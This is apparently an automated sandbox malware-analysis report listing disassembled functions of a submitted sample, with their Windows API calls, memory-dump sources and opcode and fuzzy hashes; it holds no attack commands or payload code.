                                    • Opcode ID: 65d7ca1b7f379d0ef6681c57bf3045d93e24fbf63362359972595c42944e89f4
                                    • Instruction ID: bfb631142685c294cec8d609fdacf465cbbfcca0aca235d27593dd912c156919
                                    • Opcode Fuzzy Hash: 65d7ca1b7f379d0ef6681c57bf3045d93e24fbf63362359972595c42944e89f4
                                    • Instruction Fuzzy Hash: 77513831108300AFCB04EF64D895E6ABBF9FF99314F04492DF555972A1DB71EA05CB92
                                    Function 001984DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetMenu.USER32(?), ref: 00198540
                                    • GetMenuItemCount.USER32(00000000), ref: 00198577
                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0019859F
                                    • GetMenuItemID.USER32(?,?), ref: 0019860E
                                    • GetSubMenu.USER32(?,?), ref: 0019861C
                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 0019866D
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Menu$Item$CountMessagePostString
                                    • String ID:
                                    • API String ID: 650687236-0
                                    • Opcode ID: 86e6687733bc0756ea4a2314ad5b4e0680590a698253df0f6a5eea73d12b9e39
                                    • Instruction ID: 62c16e9f33eb71edc3d7e1b0ade6d83d0e01e45fb4b49c954f9db31b4623f87a
                                    • Opcode Fuzzy Hash: 86e6687733bc0756ea4a2314ad5b4e0680590a698253df0f6a5eea73d12b9e39
                                    • Instruction Fuzzy Hash: E051CB71A00214EFCF15EFA8C881AAEB7F5FF19310F1140A9E916BB351DB70AE408B90
                                    Function 00174AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 00174B10
                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00174B5B
                                    • IsMenu.USER32(00000000), ref: 00174B7B
                                    • CreatePopupMenu.USER32 ref: 00174BAF
                                    • GetMenuItemCount.USER32(000000FF), ref: 00174C0D
                                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00174C3E
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                    • String ID:
                                    • API String ID: 3311875123-0
                                    • Opcode ID: 1311a54bc1c379021ccf832d48a2b1d25b7bbc74d07e430aec264cbcf7dfee13
                                    • Instruction ID: 82839a9b9b116db74064e3b68c20624f050e44cc61eee026269cc99eddc5b1cd
                                    • Opcode Fuzzy Hash: 1311a54bc1c379021ccf832d48a2b1d25b7bbc74d07e430aec264cbcf7dfee13
                                    • Instruction Fuzzy Hash: EB51E070601209EFDF25CF68D888BADBBF4AF55318F24C159E42D9B291E3B19E44CB52
                                    Function 0014ABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0014B34E: GetWindowLongW.USER32(?,000000EB), ref: 0014B35F
                                    • BeginPaint.USER32(?,?,?), ref: 0014AC2A
                                    • GetWindowRect.USER32(?,?), ref: 0014AC8E
                                    • ScreenToClient.USER32(?,?), ref: 0014ACAB
                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0014ACBC
                                    • EndPaint.USER32(?,?,?,?,?), ref: 0014AD06
                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 001AE673
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                    • String ID:
                                    • API String ID: 2592858361-0
                                    • Opcode ID: 071003cb479e7ec6de817f071c721519c3625f0ab10856b0f80728a5ba948163
                                    • Instruction ID: e02bc9081ce6ffba4eb7a3ddd5663cceaca6bad94aa366517fcac0acf4336a8b
                                    • Opcode Fuzzy Hash: 071003cb479e7ec6de817f071c721519c3625f0ab10856b0f80728a5ba948163
                                    • Instruction Fuzzy Hash: 14419E71544201AFC710DF24DC84FBA7BE8EF69330F150669F9A4872B1D771A885DB62
                                    Function 0019E397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • ShowWindow.USER32(001F1628,00000000,001F1628,00000000,00000000,001F1628,?,001ADC5D,00000000,?,00000000,00000000,00000000,?,001ADAD1,00000004), ref: 0019E40B
                                    • EnableWindow.USER32(00000000,00000000), ref: 0019E42F
                                    • ShowWindow.USER32(001F1628,00000000), ref: 0019E48F
                                    • ShowWindow.USER32(00000000,00000004), ref: 0019E4A1
                                    • EnableWindow.USER32(00000000,00000001), ref: 0019E4C5
                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0019E4E8
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Window$Show$Enable$MessageSend
                                    • String ID:
                                    • API String ID: 642888154-0
                                    • Opcode ID: e742345e394690283f004700219a47f392f2913448c1b914d068f3b70f0ccb34
                                    • Instruction ID: 7fdff805af059e8c94f27fdfdf087392a1bf0ae2fb92e1dcf0a28f398c62d851
                                    • Opcode Fuzzy Hash: e742345e394690283f004700219a47f392f2913448c1b914d068f3b70f0ccb34
                                    • Instruction Fuzzy Hash: 0C416A34A01141EFDF26CF28D599B947BE1BF09314F1881A9EA58CF6A2C731E852CB51
                                    Function 001798BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 001798D1
                                      • Part of subcall function 0014F4EA: std::exception::exception.LIBCMT ref: 0014F51E
                                      • Part of subcall function 0014F4EA: __CxxThrowException@8.LIBCMT ref: 0014F533
                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00179908
                                    • RtlEnterCriticalSection.NTDLL(?), ref: 00179924
                                    • RtlLeaveCriticalSection.NTDLL(?), ref: 0017999E
                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 001799B3
                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 001799D2
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                    • String ID:
                                    • API String ID: 2537439066-0
                                    • Opcode ID: a9ea14979d9e3a46bc3c6fa2c961ec446d74a56df93112f3662986c018834417
                                    • Instruction ID: 139a5dfb951851c930423487a3bb2475fa44eda7e08f72e478a4072b8e1d243a
                                    • Opcode Fuzzy Hash: a9ea14979d9e3a46bc3c6fa2c961ec446d74a56df93112f3662986c018834417
                                    • Instruction Fuzzy Hash: CD316F31900105EBDB10EFA4DC85EAFB7B8FF45314B1481B9F905AB296EB70DA55CBA0
                                    Function 00189B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,001877F4,?,?,00000000,00000001), ref: 00189B53
                                      • Part of subcall function 00186544: GetWindowRect.USER32(?,?), ref: 00186557
                                    • GetDesktopWindow.USER32 ref: 00189B7D
                                    • GetWindowRect.USER32(00000000), ref: 00189B84
                                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00189BB6
                                      • Part of subcall function 00177A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00177AD0
                                    • GetCursorPos.USER32(?), ref: 00189BE2
                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00189C44
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                    • String ID:
                                    • API String ID: 4137160315-0
                                    • Opcode ID: 3e085d2fbb3e34f4980122e8714f89325bd0026de55e49b4e85f6d3e97d74168
                                    • Instruction ID: 70e5a2af2f7cd4932ee7c47b0266fb7e3c641c311f68ae4bc855401d1cc1ad81
                                    • Opcode Fuzzy Hash: 3e085d2fbb3e34f4980122e8714f89325bd0026de55e49b4e85f6d3e97d74168
                                    • Instruction Fuzzy Hash: 5E31C172104305ABD724EF14D849FAAB7E9FF88314F040A2AF589D7181EB31EA44CB92
                                    Function 001816DA Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 309COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0013936C: __swprintf.LIBCMT ref: 001393AB
                                      • Part of subcall function 0013936C: __itow.LIBCMT ref: 001393DF
                                      • Part of subcall function 0014C6F4: _wcscpy.LIBCMT ref: 0014C717
                                    • _wcstok.LIBCMT ref: 0018184E
                                    • _wcscpy.LIBCMT ref: 001818DD
                                    • _memset.LIBCMT ref: 00181910
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                    • String ID: X
                                    • API String ID: 774024439-3081909835
                                    • Opcode ID: b468185c35f13473145bd4898b9ceaf9f1105f3572cfe5d23a783341dce7f119
                                    • Instruction ID: aaf1da5dc04e1caaf1b810746212b79ebdd9acdd6edd70222a64bd256421a8c9
                                    • Opcode Fuzzy Hash: b468185c35f13473145bd4898b9ceaf9f1105f3572cfe5d23a783341dce7f119
                                    • Instruction Fuzzy Hash: 13C18071604340AFC724EF64D992AAEB7E4BF95354F00496DF89A972A1DB30ED05CF82
                                    Function 0019EBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0014AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0014AFE3
                                      • Part of subcall function 0014AF83: SelectObject.GDI32(?,00000000), ref: 0014AFF2
                                      • Part of subcall function 0014AF83: BeginPath.GDI32(?), ref: 0014B009
                                      • Part of subcall function 0014AF83: SelectObject.GDI32(?,00000000), ref: 0014B033
                                    • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0019EC20
                                    • LineTo.GDI32(00000000,00000003,?), ref: 0019EC34
                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0019EC42
                                    • LineTo.GDI32(00000000,00000000,?), ref: 0019EC52
                                    • EndPath.GDI32(00000000), ref: 0019EC62
                                    • StrokePath.GDI32(00000000), ref: 0019EC72
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                    • String ID:
                                    • API String ID: 43455801-0
                                    • Opcode ID: 9a1806fb43607863e541da685e89ef467708a7fc11218c6ba99ceaac14f2be20
                                    • Instruction ID: aca9a9be3a25e5dc2456a6193f747b6c2972f63268a9fbe66b7df09ed88900cd
                                    • Opcode Fuzzy Hash: 9a1806fb43607863e541da685e89ef467708a7fc11218c6ba99ceaac14f2be20
                                    • Instruction Fuzzy Hash: CA110972000149BFEF06AF94EC88EEA7F6DEF08360F048112BE0899560D7719D95DBA0
                                    Function 0016E19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetDC.USER32(00000000), ref: 0016E1C0
                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0016E1D1
                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0016E1D8
                                    • ReleaseDC.USER32(00000000,00000000), ref: 0016E1E0
                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0016E1F7
                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 0016E209
                                      • Part of subcall function 00169AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00169A05,00000000,00000000,?,00169DDB), ref: 0016A53A
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CapsDevice$ExceptionRaiseRelease
                                    • String ID:
                                    • API String ID: 603618608-0
                                    • Opcode ID: f66ed005a45b1c1f2226c59af082e9afd3b9cc011ea50774aed53c0bd780c37a
                                    • Instruction ID: d46b7ee2c429c9ff55af50b8843172cc1e59dead095dfb92f07fb34759d3068d
                                    • Opcode Fuzzy Hash: f66ed005a45b1c1f2226c59af082e9afd3b9cc011ea50774aed53c0bd780c37a
                                    • Instruction Fuzzy Hash: 69018FB9A00214BFEB109BA69C45B5EBFB8EB48351F004166EE04A7290E7709C00CFA0
                                    Function 00157B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __init_pointers.LIBCMT ref: 00157B47
                                      • Part of subcall function 0015123A: __initp_misc_winsig.LIBCMT ref: 0015125E
                                      • Part of subcall function 0015123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00157F51
                                      • Part of subcall function 0015123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00157F65
                                      • Part of subcall function 0015123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00157F78
                                      • Part of subcall function 0015123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00157F8B
                                      • Part of subcall function 0015123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00157F9E
                                      • Part of subcall function 0015123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00157FB1
                                      • Part of subcall function 0015123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00157FC4
                                      • Part of subcall function 0015123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00157FD7
                                      • Part of subcall function 0015123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00157FEA
                                      • Part of subcall function 0015123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00157FFD
                                      • Part of subcall function 0015123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00158010
                                      • Part of subcall function 0015123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00158023
                                      • Part of subcall function 0015123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00158036
                                      • Part of subcall function 0015123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00158049
                                      • Part of subcall function 0015123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0015805C
                                      • Part of subcall function 0015123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0015806F
                                    • __mtinitlocks.LIBCMT ref: 00157B4C
                                      • Part of subcall function 00157E23: InitializeCriticalSectionAndSpinCount.KERNEL32(001EAC68,00000FA0,?,?,00157B51,00155E77,001E6C70,00000014), ref: 00157E41
                                    • __mtterm.LIBCMT ref: 00157B55
                                      • Part of subcall function 00157BBD: RtlDeleteCriticalSection.NTDLL(00000000), ref: 00157D3F
                                      • Part of subcall function 00157BBD: _free.LIBCMT ref: 00157D46
                                      • Part of subcall function 00157BBD: RtlDeleteCriticalSection.NTDLL(001EAC68), ref: 00157D68
                                    • __calloc_crt.LIBCMT ref: 00157B7A
                                    • GetCurrentThreadId.KERNEL32 ref: 00157BA3
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                    • String ID:
                                    • API String ID: 2942034483-0
                                    • Opcode ID: d944b59aa2df596b7c556029a59dc64af4d425684e39381aafe0d1708cb0a3f3
                                    • Instruction ID: 28883749fa107158bf4996f779d42b7994f6230bf9781704b3265da8178e9390
                                    • Opcode Fuzzy Hash: d944b59aa2df596b7c556029a59dc64af4d425684e39381aafe0d1708cb0a3f3
                                    • Instruction Fuzzy Hash: 5DF0903210D362DAE6397774BC07A5A26849F11737B210699FC74DE0D2FF24988941A1
                                    Function 001327EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0013281D
                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00132825
                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00132830
                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0013283B
                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00132843
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0013284B
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Virtual
                                    • String ID:
                                    • API String ID: 4278518827-0
                                    • Opcode ID: 600187f63cefd5749a433b28a7c7dade284a28e815785e886466bfd002b38a08
                                    • Instruction ID: 559ac762371203124da7aeb7f3627f272a7c9304467807317a09967cd866cf31
                                    • Opcode Fuzzy Hash: 600187f63cefd5749a433b28a7c7dade284a28e815785e886466bfd002b38a08
                                    • Instruction Fuzzy Hash: 850167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00421BA15C47A42C7F5A864CBE5
                                    Function 00179AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                    • String ID:
                                    • API String ID: 1423608774-0
                                    • Opcode ID: cb817db1a8f2a8356e0830f4fc10efce01ee613e5119cb1e395021c535507996
                                    • Instruction ID: d0cee19244709475ad8dabbd7455151a7d21ab01c2b1eaddfb3090f3ddd8f0b4
                                    • Opcode Fuzzy Hash: cb817db1a8f2a8356e0830f4fc10efce01ee613e5119cb1e395021c535507996
                                    • Instruction Fuzzy Hash: AC01F436102222ABD71C1B64FC49DEF7779FF88301B444279F507939A0EB749844CB50
                                    Function 00177BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00177C07
                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00177C1D
